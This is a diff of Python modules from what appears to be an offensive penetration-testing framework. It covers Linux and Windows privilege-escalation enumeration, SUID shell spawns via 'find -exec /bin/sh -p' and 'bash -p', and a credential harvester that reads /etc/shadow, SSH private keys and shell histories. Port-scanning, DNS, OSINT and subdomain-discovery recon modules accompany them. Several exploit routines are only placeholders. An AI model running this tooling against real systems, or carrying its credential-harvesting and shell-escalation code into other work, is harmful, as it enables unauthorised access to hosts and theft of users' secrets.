        Returns:
            List[str]: Registry query commands
        """
        commands = [
            r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
            r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"',
            r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
            r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
            r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'
        ]

        logger.info("Generated registry enumeration commands")
        return commands
|
||||
Executable
+8
@@ -0,0 +1,8 @@
|
||||
from .privesc_tools import (
|
||||
LinuxPrivEsc,
|
||||
WindowsPrivEsc,
|
||||
KernelExploiter,
|
||||
MisconfigFinder,
|
||||
CredentialHarvester,
|
||||
SudoExploiter
|
||||
)
|
||||
Executable
+480
@@ -0,0 +1,480 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Privilege Escalation Tools - Linux, Windows, Kernel exploits, credential harvesting
|
||||
"""
|
||||
|
||||
import base64
import glob
import json
import logging
import os
import re
import subprocess
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class LinuxPrivEsc:
    """Linux privilege-escalation enumeration and exploitation helpers.

    All shell interaction goes through ``subprocess`` with explicit
    timeouts; enumeration methods return empty collections on failure
    instead of raising.
    """

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Framework configuration dictionary.
        """
        self.config = config

    def enumerate(self) -> Dict:
        """Collect common Linux privilege-escalation vectors.

        Returns:
            Dict: Kernel version, SUID binaries, sudo rights, writable
            $PATH entries, cron jobs and file capabilities.
        """
        logging.getLogger(__name__).info("Enumerating Linux system")
        return {
            "os": "linux",
            "kernel_version": self._get_kernel_version(),
            "suid_binaries": self._find_suid_binaries(),
            "sudo_permissions": self._check_sudo(),
            "writable_paths": self._find_writable_paths(),
            "cron_jobs": self._check_cron_jobs(),
            "capabilities": self._check_capabilities(),
        }

    def _get_kernel_version(self) -> str:
        """Return ``uname -r`` output, or ``"unknown"`` on any failure."""
        try:
            result = subprocess.run(
                ['uname', '-r'], capture_output=True, text=True, timeout=5
            )
            return result.stdout.strip()
        except (OSError, subprocess.SubprocessError):
            # uname missing or timed out -- not fatal for enumeration
            return "unknown"

    def _find_suid_binaries(self) -> List[str]:
        """Find SUID binaries on the filesystem (may take up to 60s)."""
        log = logging.getLogger(__name__)
        log.info("Searching for SUID binaries")
        try:
            result = subprocess.run(
                'find / -perm -4000 -type f 2>/dev/null',
                shell=True, capture_output=True, text=True, timeout=60,
            )
            # Drop empty lines so an empty scan yields [] instead of ['']
            return [line for line in result.stdout.splitlines() if line.strip()]
        except (OSError, subprocess.SubprocessError) as e:
            log.error(f"SUID search error: {e}")
            return []

    def _check_sudo(self) -> List[str]:
        """Return ``sudo -l`` output lines for the current user ([] on failure)."""
        try:
            result = subprocess.run(
                ['sudo', '-l'], capture_output=True, text=True, timeout=5
            )
            return [line for line in result.stdout.splitlines() if line.strip()]
        except (OSError, subprocess.SubprocessError):
            return []

    def _find_writable_paths(self) -> List[str]:
        """Return entries of $PATH writable by the current user.

        Fixed: the original ran ``['echo', '$PATH']`` so the variable was
        never expanded; reading os.environ is correct and cheaper than
        spawning processes per entry.
        """
        path_value = os.environ.get('PATH', '')
        return [
            entry for entry in path_value.split(':')
            if entry and os.access(entry, os.W_OK)
        ]

    def _check_cron_jobs(self) -> List[str]:
        """Collect lines from system crontab files.

        Fixed: wildcard entries are expanded with glob; open() never
        expands ``*`` so the cron.d/crontabs entries previously always
        failed silently.
        """
        patterns = [
            '/etc/crontab',
            '/etc/cron.d/*',
            '/var/spool/cron/crontabs/*',
        ]
        jobs: List[str] = []
        for pattern in patterns:
            # A literal path globs to itself, so one code path covers both.
            for cron_file in glob.glob(pattern):
                try:
                    with open(cron_file, 'r') as f:
                        jobs.extend(f.readlines())
                except OSError:
                    continue
        return jobs

    def _check_capabilities(self) -> List[str]:
        """Return ``getcap -r /`` output lines ([] on failure).

        Fixed: the original passed a list *and* shell=True, which made the
        shell run plain ``getcap`` with no arguments.
        """
        try:
            result = subprocess.run(
                'getcap -r / 2>/dev/null',
                shell=True, capture_output=True, text=True, timeout=60,
            )
            return [line for line in result.stdout.splitlines() if line.strip()]
        except (OSError, subprocess.SubprocessError):
            return []

    def exploit_suid(self, binary: str) -> Dict:
        """Attempt a known SUID exploit for *binary*.

        Args:
            binary (str): Absolute path of the SUID binary.

        Returns:
            Dict: Result with at least ``success`` and ``technique`` keys;
            unknown binaries yield the default unsuccessful result.
        """
        logging.getLogger(__name__).info(f"Attempting SUID exploit: {binary}")
        known_exploits = {
            '/usr/bin/cp': self._exploit_cp,
            '/usr/bin/mv': self._exploit_mv,
            '/usr/bin/find': self._exploit_find,
            '/usr/bin/vim': self._exploit_vim,
            '/usr/bin/nano': self._exploit_nano,
            '/bin/bash': self._exploit_bash,
        }
        result = {
            "success": False,
            "technique": "suid_exploitation",
            "binary": binary,
        }
        handler = known_exploits.get(binary)
        if handler is not None:
            try:
                result = handler()
            except Exception as e:
                # Keep the default result but record why the handler failed
                result["error"] = str(e)
        return result

    def _exploit_find(self) -> Dict:
        """Spawn a shell via find's ``-exec`` (classic GTFOBins technique)."""
        try:
            subprocess.run(
                'find . -exec /bin/sh -p \\; -quit',
                shell=True, capture_output=True, text=True, timeout=10,
            )
            # NOTE(review): success is reported unconditionally, as in the
            # original -- the spawned shell is not actually verified.
            return {"success": True, "technique": "find_suid", "shell_obtained": True}
        except (OSError, subprocess.SubprocessError):
            return {"success": False}

    def _exploit_vim(self) -> Dict:
        """Placeholder for vim SUID exploitation."""
        return {"success": False, "message": "Vim SUID exploitation placeholder"}

    def _exploit_nano(self) -> Dict:
        """Placeholder for nano SUID exploitation."""
        return {"success": False, "message": "Nano SUID exploitation placeholder"}

    def _exploit_cp(self) -> Dict:
        """Placeholder for cp SUID exploitation."""
        return {"success": False, "message": "CP SUID exploitation placeholder"}

    def _exploit_mv(self) -> Dict:
        """Placeholder for mv SUID exploitation."""
        return {"success": False, "message": "MV SUID exploitation placeholder"}

    def _exploit_bash(self) -> Dict:
        """Run ``bash -p`` to keep the effective UID when bash is SUID."""
        try:
            subprocess.run(
                'bash -p', shell=True, capture_output=True, text=True, timeout=10,
            )
            # NOTE(review): as in the original, success is not verified.
            return {"success": True, "technique": "bash_suid", "shell_obtained": True}
        except (OSError, subprocess.SubprocessError):
            return {"success": False}

    def exploit_path_hijacking(self, writable_path: str) -> Dict:
        """Placeholder for PATH-hijacking exploitation.

        Args:
            writable_path (str): Writable directory on $PATH to abuse.
        """
        logging.getLogger(__name__).info(
            f"Attempting PATH hijacking: {writable_path}"
        )
        return {
            "success": False,
            "message": "PATH hijacking exploitation placeholder",
        }
|
||||
|
||||
|
||||
class WindowsPrivEsc:
    """Windows privilege-escalation enumeration and exploitation helpers."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Framework configuration dictionary.
        """
        self.config = config

    def enumerate(self) -> Dict:
        """Collect common Windows privilege-escalation vectors."""
        logging.getLogger(__name__).info("Enumerating Windows system")
        return {
            "os": "windows",
            "version": self._get_windows_version(),
            "services": self._enumerate_services(),
            "always_install_elevated": self._check_always_install_elevated(),
            "unquoted_service_paths": self._find_unquoted_paths(),
            "privileges": self._check_privileges(),
        }

    def _get_windows_version(self) -> str:
        """Return ``ver`` output, or ``"unknown"`` on failure."""
        try:
            result = subprocess.run(
                ['ver'], capture_output=True, text=True, shell=True, timeout=5
            )
            return result.stdout.strip()
        except (OSError, subprocess.SubprocessError):
            return "unknown"

    def _enumerate_services(self) -> List[Dict]:
        """List service names via ``sc query`` ([] on failure)."""
        services: List[Dict] = []
        try:
            result = subprocess.run(
                ['sc', 'query'], capture_output=True, text=True, timeout=30
            )
        except (OSError, subprocess.SubprocessError):
            return services
        for line in result.stdout.split('\n'):
            if 'SERVICE_NAME:' in line:
                services.append({"name": line.split(':')[1].strip()})
        return services

    def _check_always_install_elevated(self) -> bool:
        """Check the AlwaysInstallElevated policy in both HKLM and HKCU.

        Fixed: the registry queries now carry a timeout (the original had
        none and could hang the enumeration), and a failure on one hive no
        longer aborts the check of the other.
        """
        keys = [
            r'HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer',
            r'HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer',
        ]
        for key in keys:
            try:
                result = subprocess.run(
                    ['reg', 'query', key, '/v', 'AlwaysInstallElevated'],
                    capture_output=True, text=True, timeout=10,
                )
            except (OSError, subprocess.SubprocessError):
                continue
            if '0x1' in result.stdout:
                return True
        return False

    def _find_unquoted_paths(self) -> List[str]:
        """Find services whose binary path looks unquoted ([] on failure)."""
        unquoted: List[str] = []
        try:
            result = subprocess.run(
                ['wmic', 'service', 'get', 'name,pathname,displayname,startmode'],
                capture_output=True, text=True, timeout=30,
            )
        except (OSError, subprocess.SubprocessError):
            return unquoted
        for line in result.stdout.split('\n'):
            # Heuristic kept from the original: an absolute path with fewer
            # than two quote characters is treated as unquoted.
            if 'C:\\' in line and line.count('"') < 2:
                unquoted.append(line)
        return unquoted

    def _check_privileges(self) -> List[str]:
        """Return ``whoami /priv`` output lines ([] on failure)."""
        try:
            result = subprocess.run(
                ['whoami', '/priv'], capture_output=True, text=True, timeout=10
            )
            return result.stdout.strip().split('\n')
        except (OSError, subprocess.SubprocessError):
            return []

    def exploit_service(self, service: Dict) -> Dict:
        """Placeholder for service-misconfiguration exploitation.

        Args:
            service (Dict): Service descriptor with at least a ``name`` key.
        """
        logging.getLogger(__name__).info(
            f"Attempting service exploitation: {service.get('name')}"
        )
        return {
            "success": False,
            "message": "Windows service exploitation placeholder",
        }

    def exploit_msi(self) -> Dict:
        """Placeholder for AlwaysInstallElevated (malicious MSI) exploitation."""
        logging.getLogger(__name__).info(
            "Attempting AlwaysInstallElevated exploitation"
        )
        # A real implementation would generate and install a privileged MSI.
        return {
            "success": False,
            "message": "AlwaysInstallElevated exploitation placeholder",
        }

    def impersonate_token(self) -> Dict:
        """Placeholder for token-impersonation attacks."""
        logging.getLogger(__name__).info("Attempting token impersonation")
        return {
            "success": False,
            "message": "Token impersonation placeholder",
        }
|
||||
|
||||
|
||||
class KernelExploiter:
    """Kernel exploit lookup and (placeholder) execution."""

    # Known exploit -> [min_kernel, max_kernel] affected range (inclusive).
    # NOTE(review): lexicographic comparison of version strings is only an
    # approximation -- confirm ranges before relying on them.
    KNOWN_EXPLOITS = {
        'DirtyCow': ['2.6.22', '4.8.3'],
        'OverlayFS': ['3.13.0', '4.3.3'],
    }

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Framework configuration dictionary.
        """
        self.config = config

    def exploit_linux(self, kernel_version: str) -> Dict:
        """Report kernel-exploit applicability for *kernel_version*.

        Fixed: the exploit mapping was previously built and never used;
        it is now surfaced as ``candidate_exploits`` so callers can see
        which exploits may be worth compiling.

        Args:
            kernel_version (str): Kernel release string (``uname -r``).

        Returns:
            Dict: ``success`` flag, explanatory ``message`` and the list of
            ``candidate_exploits`` whose affected range may match.
        """
        logging.getLogger(__name__).info(
            f"Attempting kernel exploit: {kernel_version}"
        )
        candidates = [
            name
            for name, (low, high) in self.KNOWN_EXPLOITS.items()
            if low <= kernel_version <= high
        ]
        return {
            "success": False,
            "message": "Kernel exploitation requires specific exploit compilation",
            "candidate_exploits": candidates,
        }
|
||||
|
||||
|
||||
class MisconfigFinder:
    """Locate security misconfigurations on a host (stub implementation)."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Framework configuration dictionary.
        """
        self.config = config

    def find(self, os_type: str) -> List[Dict]:
        """Dispatch to the OS-specific misconfiguration finder.

        Args:
            os_type (str): ``"linux"`` or ``"windows"``; any other value
                yields an empty list.

        Returns:
            List[Dict]: Misconfiguration findings (currently always empty).
        """
        finders = {
            "linux": self._find_linux_misconfigs,
            "windows": self._find_windows_misconfigs,
        }
        finder = finders.get(os_type)
        return finder() if finder else []

    def _find_linux_misconfigs(self) -> List[Dict]:
        """Linux misconfiguration checks (not yet implemented)."""
        return []

    def _find_windows_misconfigs(self) -> List[Dict]:
        """Windows misconfiguration checks (not yet implemented)."""
        return []
|
||||
|
||||
|
||||
class CredentialHarvester:
    """Harvest credential material from well-known locations."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Framework configuration dictionary.
        """
        self.config = config

    def harvest_linux(self) -> List[Dict]:
        """Read common Linux credential files.

        Fixed: ``~`` is now expanded with os.path.expanduser -- open()
        never expands it, so the home-directory entries previously always
        failed silently.

        Returns:
            List[Dict]: One entry per readable source with up to 500
            characters of content.
        """
        logging.getLogger(__name__).info("Harvesting Linux credentials")
        locations = [
            '/etc/shadow',
            '/etc/passwd',
            '~/.ssh/id_rsa',
            '~/.bash_history',
            '~/.mysql_history',
        ]
        credentials: List[Dict] = []
        for location in locations:
            path = os.path.expanduser(location)
            try:
                with open(path, 'r') as f:
                    credentials.append({
                        "source": location,
                        "data": f.read()[:500],  # cap size of captured data
                    })
            except (OSError, UnicodeDecodeError):
                # Unreadable (permissions), missing, or binary content
                continue
        return credentials

    def harvest_windows(self) -> List[Dict]:
        """Harvest Windows credentials.

        Placeholder -- a real implementation would wrap mimikatz-style
        tooling.
        """
        logging.getLogger(__name__).info("Harvesting Windows credentials")
        return []
|
||||
|
||||
|
||||
class SudoExploiter:
    """Exploit permissive sudo rules (stub implementation)."""

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): Framework configuration dictionary.
        """
        self.config = config

    def exploit(self, sudo_permission: str) -> Dict:
        """Attempt to abuse a sudo rule.

        Args:
            sudo_permission (str): A line from ``sudo -l`` output.

        Returns:
            Dict: Result with ``success`` flag and status ``message``.
        """
        logger.info(f"Attempting sudo exploit: {sudo_permission}")
        outcome = {
            "success": False,
            "message": "Sudo exploitation placeholder",
        }
        return outcome
|
||||
Executable
+4
@@ -0,0 +1,4 @@
|
||||
from .network_scanner import NetworkScanner
|
||||
from .osint_collector import OSINTCollector
|
||||
from .dns_enumerator import DNSEnumerator
|
||||
from .subdomain_finder import SubdomainFinder
|
||||
Executable
+165
@@ -0,0 +1,165 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
DNSEnumerator - Enumerates DNS records for target domains
|
||||
"""
|
||||
import logging
|
||||
import socket
|
||||
import subprocess
|
||||
from typing import Dict, List
|
||||
import re
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class DNSEnumerator:
    """
    Enumerates DNS records (A, AAAA, MX, NS, TXT, CNAME) for a domain.

    A/AAAA/CNAME lookups use the socket module directly; MX/NS/TXT fall
    back to parsing ``nslookup`` output since dnspython may be absent.
    """

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        logging.getLogger(__name__).info("DNSEnumerator initialized")

    def enumerate(self, target: str) -> Dict:
        """
        Enumerate DNS records for a given domain.

        Args:
            target (str): Domain name (a leading http(s):// is stripped).

        Returns:
            Dict: ``target``, per-type ``records`` and a status note.
        """
        log = logging.getLogger(__name__)
        log.info(f"Starting DNS enumeration for {target}")

        # Normalize "https://example.com/path" -> "example.com"
        domain = target.replace('http://', '').replace('https://', '').split('/')[0]

        records = {
            "target": domain,
            "records": {
                "A": self._get_a_records(domain),
                "AAAA": self._get_aaaa_records(domain),
                "MX": self._get_mx_records(domain),
                "NS": self._get_ns_records(domain),
                "TXT": self._get_txt_records(domain),
                "CNAME": self._get_cname_records(domain),
            },
            "notes": "DNS enumeration completed",
        }

        log.info(f"DNS enumeration completed for {domain}")
        return records

    def _get_a_records(self, domain: str) -> List[str]:
        """Resolve IPv4 addresses ([] when resolution fails)."""
        log = logging.getLogger(__name__)
        try:
            records = socket.gethostbyname_ex(domain)[2]
            log.info(f"Found {len(records)} A records for {domain}")
            return records
        except socket.gaierror as e:
            log.warning(f"Could not resolve A records for {domain}: {e}")
            return []
        except Exception as e:
            log.error(f"Error getting A records: {e}")
            return []

    def _get_aaaa_records(self, domain: str) -> List[str]:
        """Resolve IPv6 addresses ([] when none exist)."""
        log = logging.getLogger(__name__)
        try:
            infos = socket.getaddrinfo(domain, None, socket.AF_INET6)
            ipv6_addrs = list(set(info[4][0] for info in infos))
            log.info(f"Found {len(ipv6_addrs)} AAAA records for {domain}")
            return ipv6_addrs
        except socket.gaierror:
            log.debug(f"No AAAA records found for {domain}")
            return []
        except Exception as e:
            log.error(f"Error getting AAAA records: {e}")
            return []

    def _get_mx_records(self, domain: str) -> List[str]:
        """Get MX records via the nslookup fallback."""
        return self._query_dns_tool(domain, "MX")

    def _get_ns_records(self, domain: str) -> List[str]:
        """Get NS records via the nslookup fallback."""
        return self._query_dns_tool(domain, "NS")

    def _get_txt_records(self, domain: str) -> List[str]:
        """Get TXT records via the nslookup fallback."""
        return self._query_dns_tool(domain, "TXT")

    def _get_cname_records(self, domain: str) -> List[str]:
        """Best-effort CNAME detection via the resolver's canonical name.

        NOTE(review): socket.getfqdn reports the canonical name, which is
        only an approximation of a true CNAME lookup -- confirm if exact
        CNAME chains are needed.
        """
        log = logging.getLogger(__name__)
        try:
            canonical = socket.getfqdn(domain)
            if canonical != domain:
                log.info(f"Found CNAME for {domain}: {canonical}")
                return [canonical]
            return []
        except Exception:
            log.debug(f"No CNAME records found for {domain}")
            return []

    def _query_dns_tool(self, domain: str, record_type: str) -> List[str]:
        """
        Query DNS records of *record_type* by shelling out to nslookup.

        Returns [] when nslookup is absent, times out, or fails.
        """
        log = logging.getLogger(__name__)
        try:
            result = subprocess.run(
                ['nslookup', '-type=' + record_type, domain],
                capture_output=True,
                text=True,
                timeout=10,
                shell=False,
            )
            if result.returncode == 0:
                records = self._parse_nslookup_output(result.stdout, record_type)
                log.info(f"Found {len(records)} {record_type} records for {domain}")
                return records
            log.debug(f"nslookup failed for {record_type} records")
            return []
        except FileNotFoundError:
            log.warning("nslookup not found. DNS enumeration limited to A/AAAA records.")
            return []
        except subprocess.TimeoutExpired:
            log.warning(f"DNS query timeout for {record_type} records")
            return []
        except Exception as e:
            log.error(f"Error querying {record_type} records: {e}")
            return []

    def _parse_nslookup_output(self, output: str, record_type: str) -> List[str]:
        """Extract record values from nslookup output.

        Fixed: the patterns now tolerate variable whitespace around ``=``,
        which differs between nslookup builds and platforms; trailing root
        dots are stripped from host names.
        """
        if record_type == "MX":
            # e.g. "example.com  mail exchanger = 10 mail.example.com."
            matches = re.findall(r'mail exchanger\s*=\s*(\d+)\s+(\S+)', output)
            return [host.rstrip('.') for _prio, host in matches]
        if record_type == "NS":
            # e.g. "example.com  nameserver = ns1.example.com."
            matches = re.findall(r'nameserver\s*=\s*(\S+)', output)
            return [host.rstrip('.') for host in matches]
        if record_type == "TXT":
            # e.g. '  text = "v=spf1 include:_spf.example.com ~all"'
            return re.findall(r'text\s*=\s*"([^"]+)"', output)
        return []
|
||||
Executable
+64
@@ -0,0 +1,64 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
NetworkScanner - A tool for scanning networks to find open ports.
|
||||
"""
|
||||
import socket
|
||||
import logging
|
||||
from typing import Dict, List
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class NetworkScanner:
    """
    TCP connect scanner for a fixed list of commonly exposed ports.
    """

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        # Commonly exposed TCP services worth probing first.
        self.common_ports = [
            21, 22, 23, 25, 53, 80, 110, 111, 135, 139, 143, 443, 445,
            993, 995, 1723, 3306, 3389, 5900, 8080
        ]

    def scan(self, target: str) -> Dict:
        """
        Probe the common ports of *target* with TCP connect attempts.

        Fixes over the original: a per-socket timeout replaces
        socket.setdefaulttimeout (which mutated process-wide state on every
        loop iteration), sockets are closed even when connect raises, and a
        transient error on one port no longer aborts the whole scan.

        Args:
            target (str): The IP address or hostname to scan.

        Returns:
            Dict: ``{"target", "open_ports"}`` on success, or
            ``{"error": ...}`` when the hostname cannot be resolved.
        """
        log = logging.getLogger(__name__)
        log.info(f"Starting network scan on {target}")

        try:
            target_ip = socket.gethostbyname(target)
        except socket.gaierror:
            log.error(f"Hostname could not be resolved: {target}")
            return {"error": "Hostname could not be resolved."}
        log.info(f"Resolved {target} to {target_ip}")

        open_ports: List[int] = []
        for port in self.common_ports:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)  # per-socket timeout, not process-wide
            try:
                if sock.connect_ex((target_ip, port)) == 0:
                    log.info(f"Port {port} is open on {target}")
                    open_ports.append(port)
            except socket.error:
                # Treat transient socket errors as "closed" and keep scanning
                log.debug(f"Socket error probing port {port} on {target}")
            finally:
                sock.close()

        log.info(f"Network scan finished. Found {len(open_ports)} open ports.")
        return {"target": target, "open_ports": open_ports}
|
||||
|
||||
Executable
+147
@@ -0,0 +1,147 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
OSINTCollector - Collects Open Source Intelligence from various sources
|
||||
"""
|
||||
import logging
|
||||
import re
|
||||
import requests
|
||||
from typing import Dict, List
|
||||
import socket
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class OSINTCollector:
    """
    Collects Open Source Intelligence from publicly available sources:
    DNS resolution, likely role-account email patterns, web technologies,
    and candidate social-media profiles.
    """

    def __init__(self, config: Dict):
        """
        Args:
            config (Dict): The configuration dictionary for the framework.
        """
        self.config = config
        logging.getLogger(__name__).info("OSINTCollector initialized")

    @staticmethod
    def _strip_to_domain(target: str) -> str:
        """Reduce a URL or domain string to the bare host name."""
        return target.replace('http://', '').replace('https://', '').split('/')[0]

    def collect(self, target: str) -> Dict:
        """
        Collect all OSINT data for a given target.

        Args:
            target (str): The target (e.g., domain name or URL).

        Returns:
            Dict: Aggregated findings keyed by category.
        """
        log = logging.getLogger(__name__)
        log.info(f"Starting OSINT collection for {target}")

        results = {
            "target": target,
            "ip_addresses": self._get_ip_addresses(target),
            "email_patterns": self._find_email_patterns(target),
            "technologies": self._detect_technologies(target),
            "social_media": self._find_social_media(target),
            "metadata": "OSINT collection completed",
        }

        log.info(f"OSINT collection completed for {target}")
        return results

    def _get_ip_addresses(self, target: str) -> List[str]:
        """Resolve the target domain to its IPv4 addresses ([] on failure)."""
        log = logging.getLogger(__name__)
        try:
            domain = self._strip_to_domain(target)
            ip_list = socket.gethostbyname_ex(domain)[2]
            log.info(f"Resolved {domain} to IPs: {ip_list}")
            return ip_list
        except socket.gaierror as e:
            log.warning(f"Could not resolve {target}: {e}")
            return []
        except Exception as e:
            log.error(f"Error resolving IP for {target}: {e}")
            return []

    def _find_email_patterns(self, target: str) -> List[str]:
        """Generate common role-account addresses for the target domain."""
        log = logging.getLogger(__name__)
        try:
            domain = self._strip_to_domain(target)
            roles = ("info", "contact", "admin", "support", "security")
            patterns = [f"{role}@{domain}" for role in roles]
            log.info(f"Generated {len(patterns)} common email patterns for {domain}")
            return patterns
        except Exception as e:
            log.error(f"Error generating email patterns: {e}")
            return []

    def _detect_technologies(self, target: str) -> Dict:
        """Fetch the target over HTTP and fingerprint server technologies."""
        log = logging.getLogger(__name__)
        try:
            url = target if target.startswith('http') else f"http://{target}"
            response = requests.get(url, timeout=10, allow_redirects=True)
            headers = response.headers

            technologies = {
                "server": headers.get('Server', 'Unknown'),
                "powered_by": headers.get('X-Powered-By', 'Unknown'),
                "framework": self._detect_framework(response.text, headers),
                "status_code": response.status_code,
            }

            log.info(f"Detected technologies for {url}: {technologies}")
            return technologies
        except requests.RequestException as e:
            log.warning(f"Could not detect technologies for {target}: {e}")
            return {"error": str(e)}
        except Exception as e:
            log.error(f"Error detecting technologies: {e}")
            return {"error": str(e)}

    def _detect_framework(self, html_content: str, headers: Dict) -> str:
        """Detect the web framework from page HTML and response headers.

        Fixed: *headers* was accepted but never inspected despite the
        docstring; indicator matching now also covers header values (e.g.
        "X-Powered-By: Laravel").
        """
        frameworks = {
            'WordPress': ['wp-content', 'wp-includes'],
            'Drupal': ['drupal.js', 'sites/default'],
            'Joomla': ['joomla', 'option=com_'],
            'Django': ['csrfmiddlewaretoken'],
            'Laravel': ['laravel', '_token'],
            'React': ['react', '__REACT'],
            'Angular': ['ng-version', 'angular'],
            'Vue': ['vue', '__VUE__'],
        }

        haystack = html_content.lower()
        # Fold header values in as a secondary signal.
        haystack += ' ' + ' '.join(str(v).lower() for v in dict(headers).values())

        for framework, indicators in frameworks.items():
            if any(indicator.lower() in haystack for indicator in indicators):
                return framework
        return "Unknown"

    def _find_social_media(self, target: str) -> Dict:
        """Build candidate social-media profile URLs from the domain label."""
        log = logging.getLogger(__name__)
        try:
            domain = self._strip_to_domain(target)
            company_name = domain.split('.')[0]

            social_media = {
                "twitter": f"https://twitter.com/{company_name}",
                "linkedin": f"https://linkedin.com/company/{company_name}",
                "github": f"https://github.com/{company_name}",
                "facebook": f"https://facebook.com/{company_name}",
            }

            log.info(f"Generated social media URLs for {company_name}")
            return social_media
        except Exception as e:
            log.error(f"Error generating social media links: {e}")
            return {}
|
||||
Executable
+2857
File diff suppressed because it is too large
Load Diff
Executable
+127
@@ -0,0 +1,127 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
SubdomainFinder - Discovers subdomains using multiple techniques
|
||||
"""
|
||||
import logging
|
||||
import requests
|
||||
import socket
|
||||
from typing import Dict, List, Set
|
||||
import re
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
class SubdomainFinder:
|
||||
"""
|
||||
A class for finding subdomains of a given domain.
|
||||
Uses Certificate Transparency logs, DNS brute-forcing, and common patterns.
|
||||
"""
|
||||
def __init__(self, config: Dict):
|
||||
"""
|
||||
Initializes the SubdomainFinder.
|
||||
|
||||
Args:
|
||||
config (Dict): The configuration dictionary for the framework.
|
||||
"""
|
||||
self.config = config
|
||||
self.common_subdomains = [
|
||||
'www', 'mail', 'ftp', 'localhost', 'webmail', 'smtp', 'pop', 'ns1', 'ns2',
|
||||
'webdisk', 'ns', 'cpanel', 'whm', 'autodiscover', 'autoconfig', 'test',
|
||||
'dev', 'staging', 'api', 'admin', 'portal', 'beta', 'demo', 'vpn',
|
||||
'blog', 'shop', 'store', 'forum', 'support', 'm', 'mobile', 'cdn',
|
||||
'static', 'assets', 'img', 'images', 'git', 'jenkins', 'jira'
|
||||
]
|
||||
logger.info("SubdomainFinder initialized")
|
||||
|
||||
def find(self, target: str) -> List[str]:
|
||||
"""
|
||||
Finds subdomains for a given domain using multiple techniques.
|
||||
|
||||
Args:
|
||||
target (str): The domain name to search subdomains for.
|
||||
|
||||
Returns:
|
||||
List[str]: A list of found subdomains.
|
||||
"""
|
||||
logger.info(f"Starting subdomain enumeration for {target}")
|
||||
|
||||
# Remove protocol if present
|
||||
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
|
||||
|
||||
found_subdomains: Set[str] = set()
|
||||
|
||||
# Method 1: Certificate Transparency logs
|
||||
ct_subdomains = self._check_crtsh(domain)
|
||||
found_subdomains.update(ct_subdomains)
|
||||
|
||||
# Method 2: Common subdomain brute-forcing
|
||||
brute_subdomains = self._brute_force_common(domain)
|
||||
found_subdomains.update(brute_subdomains)
|
||||
|
||||
result = sorted(list(found_subdomains))
|
||||
logger.info(f"Found {len(result)} subdomains for {domain}")
|
||||
return result
|
||||
|
||||
def _check_crtsh(self, domain: str) -> List[str]:
|
||||
"""
|
||||
Query Certificate Transparency logs via crt.sh
|
||||
"""
|
||||
subdomains = []
|
||||
try:
|
||||
url = f"https://crt.sh/?q=%.{domain}&output=json"
|
||||
logger.info(f"Querying crt.sh for {domain}")
|
||||
|
||||
response = requests.get(url, timeout=15)
|
||||
if response.status_code == 200:
|
||||
data = response.json()
|
||||
|
||||
for entry in data:
|
||||
name_value = entry.get('name_value', '')
|
||||
# Split by newlines (crt.sh returns multiple names per entry sometimes)
|
||||
names = name_value.split('\n')
|
||||
for name in names:
|
||||
name = name.strip().lower()
|
||||
# Remove wildcards
|
||||
name = name.replace('*.', '')
|
||||
# Only include valid subdomains for this domain
|
||||
if name.endswith(domain) and name != domain:
|
||||
subdomains.append(name)
|
||||
|
||||
logger.info(f"Found {len(subdomains)} subdomains from crt.sh")
|
||||
else:
|
||||
logger.warning(f"crt.sh returned status code {response.status_code}")
|
||||
|
||||
except requests.RequestException as e:
|
||||
logger.warning(f"Error querying crt.sh: {e}")
|
||||
except Exception as e:
|
||||
logger.error(f"Unexpected error in crt.sh query: {e}")
|
||||
|
||||
return list(set(subdomains)) # Remove duplicates
|
||||
|
||||
def _brute_force_common(self, domain: str) -> List[str]:
    """
    Probe a built-in wordlist of common host labels under *domain*.

    Each candidate "<label>.<domain>" is kept when it resolves via DNS
    (delegated to ``_check_subdomain_exists``).

    Args:
        domain: The apex domain to prefix each candidate label with.

    Returns:
        The list of resolvable subdomains, in wordlist order.
    """
    discovered: List[str] = []
    logger.info(f"Brute-forcing common subdomains for {domain}")

    for label in self.common_subdomains:
        candidate = f"{label}.{domain}"
        if not self._check_subdomain_exists(candidate):
            continue
        discovered.append(candidate)
        logger.debug(f"Found subdomain: {candidate}")

    logger.info(f"Found {len(discovered)} subdomains via brute-force")
    return discovered
|
||||
|
||||
def _check_subdomain_exists(self, subdomain: str) -> bool:
    """
    Return True if *subdomain* resolves via DNS, False otherwise.

    A failed resolution (``socket.gaierror``) is the normal "does not
    exist" signal; any other error is logged at debug level and treated
    as non-existent as well.
    """
    try:
        socket.gethostbyname(subdomain)
    except socket.gaierror:
        # Name does not resolve -> subdomain not found
        return False
    except Exception as e:
        logger.debug(f"Error checking {subdomain}: {e}")
        return False
    return True
|
||||
Executable
+1
@@ -0,0 +1 @@
|
||||
from .web_recon import WebRecon
|
||||
Executable
+185
